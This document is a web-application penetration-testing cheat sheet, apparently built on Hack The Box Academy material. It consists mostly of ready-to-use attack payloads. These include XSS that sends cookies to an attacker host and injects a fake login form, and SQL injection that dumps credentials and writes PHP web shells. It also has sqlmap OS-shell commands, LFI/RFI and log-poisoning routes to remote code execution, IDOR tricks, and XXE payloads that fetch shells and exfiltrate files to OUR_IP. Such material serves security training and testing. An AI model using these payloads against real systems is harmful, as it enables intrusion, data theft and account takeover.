Part 1
Tools like smuggler.py (Python) can be used to identify potential HTTP request smuggling vulnerabilities.
<script>alert(window.origin)</script>
Basic XSS Payload
<plaintext>
Basic XSS Payload
<script>print()</script>
Basic XSS Payload
<img src="" onerror=alert(window.origin)>
HTML-based XSS Payload
<script>document.body.style.background = "#141d2b"</script>
Change Background Color
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
Change Background Image
<script>document.title = 'HackTheBox Academy'</script>
Change Website Title
<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>
Overwrite website's main body
<script>document.getElementById('urlform').remove();</script>
Remove certain HTML element
<script src="http://OUR_IP/script.js"></script>
Load remote script
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>
Send Cookie details to us
<iframe src=file:///C:/windows/win.ini>
Load remote ini file via iframe tag
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
Login Form Injection
curl -isk "https://site.com"
Test for status of Content Security Policy
Serve XSS 𝙥𝙖𝙮𝙡𝙤𝙖𝙙 from a XML file
<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>
Sample XSS Polyglot
'"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT>
How to perform basic Login Form Injection via Reflected XSS
Step 1: Test vulnerable form for the remove function by running script in console (Dev-Tools)
document.getElementById('urlform').remove();
Step 2: Inject form into webpage with XSS payload by executing the below script into console (Dev-tools)
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
After successfully authenticating to a SQL Server It is worth a shot to verify if xp_cmdshell has been previously activated with:\
EXEC xp_cmdshell 'net user';
If xp_cmdshell has not been activated, run the below commands to activate and utilize Windows XP cmd commands within SQL:
# The command below enables sp_configure
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE; sp_configure;
message EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Basic SQL Testing
SELECT
Select data from database
FROM
Specify table to retrieve data
WHERE
Filter query to match a given condition
INSERT
Add single row to table
CREATE
Used to Create a TABLE, DATABASE, INDEX or VIEW
ALTER TABLE
Add/Remove columns from a table
UPDATE
Update table data
DELETE
Delete rows from table
AS
Used to rename column/table with alias
JOIN
Combine rows from 2 or more tables
AND
Combine query conditions (must meet all conditions)
OR
Combine query conditions. (only one must be met)
LIMIT
Limit the amount of rows returned
IN
Specify multiple values (only used with WHERE)
CASE
Return value on a specified condition
IS NULL
Return only rows with a NULL value
LIKE
Search for pattern in a column
COMMIT
Write a transaction to the database
ROLLBACK
Undo a transaction
DROP
Delete TABLE, DATABASE or INDEX
GROUP BY
Group data into logical sets
ORDER BY
Set order of results
HAVING
Functions like WHERE but filters groups
COUNT
Count rows
SUM
Return a sum of a column
AVG
Return average of a column
MIN
Return min value of a column
MAX
Return max value of a column
MySQL Basics
General
mysql -u root -h docker.hackthebox.eu -P 3306 -p
login to mysql database
SHOW DATABASES
List available databases
USE users
Switch to database
Tables
CREATE TABLE logins (id INT, ...)
Add a new table
SHOW TABLES
List available tables in current database
DESCRIBE logins
Show table properties and columns
INSERT INTO table_name VALUES (value_1,..)
Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)
Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, ... WHERE <condition>
Update table values
Columns
SELECT * FROM table_name
Show all columns in a table
SELECT column1, column2 FROM table_name
Show specific columns in a table
DROP TABLE logins
Delete a table
ALTER TABLE logins ADD newColumn INT
Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn
Rename column
ALTER TABLE logins MODIFY oldColumn DATE
Change column datatype
ALTER TABLE logins DROP oldColumn
Delete column
Output
SELECT * FROM logins ORDER BY column_1
Sort by column
SELECT * FROM logins ORDER BY column_1 DESC
Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC
Sort by two-columns
SELECT * FROM logins LIMIT 2
Only show first two results
SELECT * FROM logins LIMIT 1, 2
Only show first two results starting from index 2
SELECT * FROM table_name WHERE <condition>
List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%'
List results where the name is similar to a given string
MySQL Operator Precedence
Division (
/
), Multiplication (*
), and Modulus (%
)Addition (
+
) and Subtraction (-
)Comparison (
=
,>
,<
,<=
,>=
,!=
,LIKE
)NOT (
!
)AND (
&&
)OR (
||
)
SQL Injection
Auth Bypass
admin' or '1'='1
Basic Auth Bypass
admin')-- -
Basic Auth Bypass With comments
Union Injection
' order by 1-- -
Detect number of columns using order by
cn' UNION select 1,2,3-- -
Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- -
Basic Union injection
UNION select username, 2, 3, 4 from passwords-- -
Union injection for 4 columns
DB Enumeration
SELECT @@version
Fingerprint MySQL with query output
SELECT SLEEP(5)
Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- -
Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- -
Dump data from a table in another database
Privileges
cn' UNION SELECT 1, user(), 3, 4-- -
Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -
Find if all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
Write a string to a local file
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Write a web shell into the base web directory
NoSQL Basics
show dbs;
List all the databases present
use user_creds;
Switch to database named "user_creds"
show collections;
List out the collections in a database
db.flag.find().pretty()
Dump the contents of the documents present in the flag collection
http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
Basic NoSQLi Login
SQLmap
sqlmap -h
View the basic help menu
sqlmap -hh
View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch
Run SQLMap
without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test'
SQLMap
with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'
POST request specifying an injection point with an asterisk
sqlmap -r req.txt
Passing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=abcdefghijklmnop'
Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT
Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt
Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch
Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5
Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"
Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema
Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user
Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
Anti-CSRF token bypass
sqlmap --list-tampers
List all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
Check for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shell
Spawning an OS shell
WAF BYPASSES
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
Passwords
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users
LFI workaround PoC
LFI via this path does not work at first
/fileRead.jsp?fileName=/etc/passwd (406)
But after replacing character with ? you may receive a successful response (200)
/fileRead.jsp?fileName=/?tc/?asswd (200)
fileRead.jsp?fileName=/??c/??sswd (200)
Fuzzing Parameters
# Fuff
ffuf -w $SECLISTS/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
LFI Wordlists
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-Jhaddix.txt
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt
https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/File%20Inclusion/#basic-lfi
Local File Inclusion (LFI)
# Basic LFI
/etc/passwd
# Path Traversal
../../../../../../etc/passwd
Basic Bypasses
# When / is filtered
....//....//....//....//etc/passwd
# Other Techniques
....////
# Path Truncation
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done
# Null Bytes
../../../../../../etc/passwd%00
PHP Filters
php://filter/read=convert.base64-encode/resource=config
PHP Wrappers
Data Wrapper
The data wrapper is only available to use if the (allow_url_include) setting is enabled in the PHP configurations.
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check allow_url_Include Enabled
php.ini | grep allow_url_include
# Remote Code Execution
echo '<?php system($_GET["cmd"]); ?>' | base64
data://text/plain;base64,<base64>&cmd=id
Input Wrapper
Must accept POST requests for this attack to work. The input wrapper also depends on the allow_url_include setting
# Gaining Remote Code Execution
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
Expect Wrapper
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check allow_url_Include Enabled
php.ini | grep expect
# Gaining Remote Code Execution
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
Remote File Inclusion (RFI)
# Verify RFI
cat php.ini | grep allow_url_include
# RFI File
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Host File
sudo python3 -m http.server 8000
# Execute Command
/shell.php&cmd=id
LFI & File Uploads
Image Upload
# Create RCE File
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
# Execute Command
./profile_images/shell.gif&cmd=id
ZIP Upload
# Create Malicous ZIP File
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
# Execute Command
zip://./profile_images/shell.jpg%23shell.php&cmd=id
PHAR Upload
# Create Malicous PHP File
## Shell.php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
# Compile PHP -> Phar
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
# Execute Command
phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
Log Poisoning
PHP Session Poisoning
# Check PHP Session Cookie
/var/lib/php/sessions/sess_<your_session_id>
# Poison Log
/var/lib/php/sessions/%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
# RCE
/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
Server Log Poisoning
# Default Location Apache
/var/log/apache2/access.log
/var/log/apache2/error.log
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
# Default Location Nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
C:\nginx\log\access.log
C:\nginx\log\error.log
# Inject Into User-Agent Header
User-Agent: <?php system($_GET["cmd"]); ?>
# Code Execution
/var/log/apache2.log&cmd=id
File Inclusion Parameters
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
Find and replace
IDs
in urls, headers and body :/users/01
=>/users/02
Try Parameter Pollution:
users=01
=>users=01&users=02
Special Characters:
/users/01*
or/users/*
=> Disclosure of every single userTry Older versions of API endpoints:
/api/v3/users/01
=>/api/v1/users/02
Add extension:
/users/01
=>/users/02.json
Change Request Methods: POST /users/01 =>
GET, PUT, PATCH, DELETE, OPTIONS,
etcCheck if Referer or other Headers are used to validate
IDs:
Encrypted IDs: If application is using encrypted IDs, try to decrypt using hashing/cracking tool
Send wildcard
{""user_id"":""*""}
Send ID twice
URL?id=&id=
JSON wrap {“id”:111} -->
{“id”:{“id”:111}}
Wrap ID with an array {“id”:111} -->
{“id”:[111]}
Swap GUID with Numeric ID or email:
/users/XXXXXXXX-XXXX-XXXX-XXXXXXXXXXXX
=>/users/02
or/users/a@b.com
Try GUIDs such as:
00000000-0000-0000-000000000000
and11111111-1111-1111-111111111111
GUID Enumeration: Try to disclose GUIDs using
Google Dorks
,Github
,Wayback
,Burp history
If none of the GUID Enumeration methods work then try:
SignUp
,Reset Password
, andother endpoints
and analyze the responses. An endpoint may disclose user's GUID within the application.When a server responds with a 401/403, the action may still be performed. Ensure to verify the function within the application.
Blind IDORs: Look for endpoints/features that may disclose information
Chain IDOR with XSS for Account Takeovers\
Send Post request with path to xml file for exploitation
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
OR Use a script to send payload: curl.sh
#!/bin/bash
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
ID.xml
<!--ID command example-->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
Read Robots.txt (Base 64)
<!--Base64 response example-->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/respource=http://vulnerable site/" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
Local File Disclosure
<!DOCTYPE email [
<!ENTITY read SYSTEM "file:///etc/passwd">
]>
<!DOCTYPE email [
<!ENTITY read SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
RCE
# Create RCE Shell
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
# XXE Injection
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
Advanced File Disclosure
Exfiltration with CDATA
# Create DTD File
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
# Upload XXE
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd">
%xxe;
]>
...
<email>&joined;</email>
Error Based XXE
# DTD File
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
# Upload XXE
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%error;
]>
Blind Data Exfiltration
Out of Band Data Exfiltration
# DTD File
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
# PHP Server Setup
?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?>
# Run PHP Server
php -S 0.0.0.0:8000
# XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>
Last updated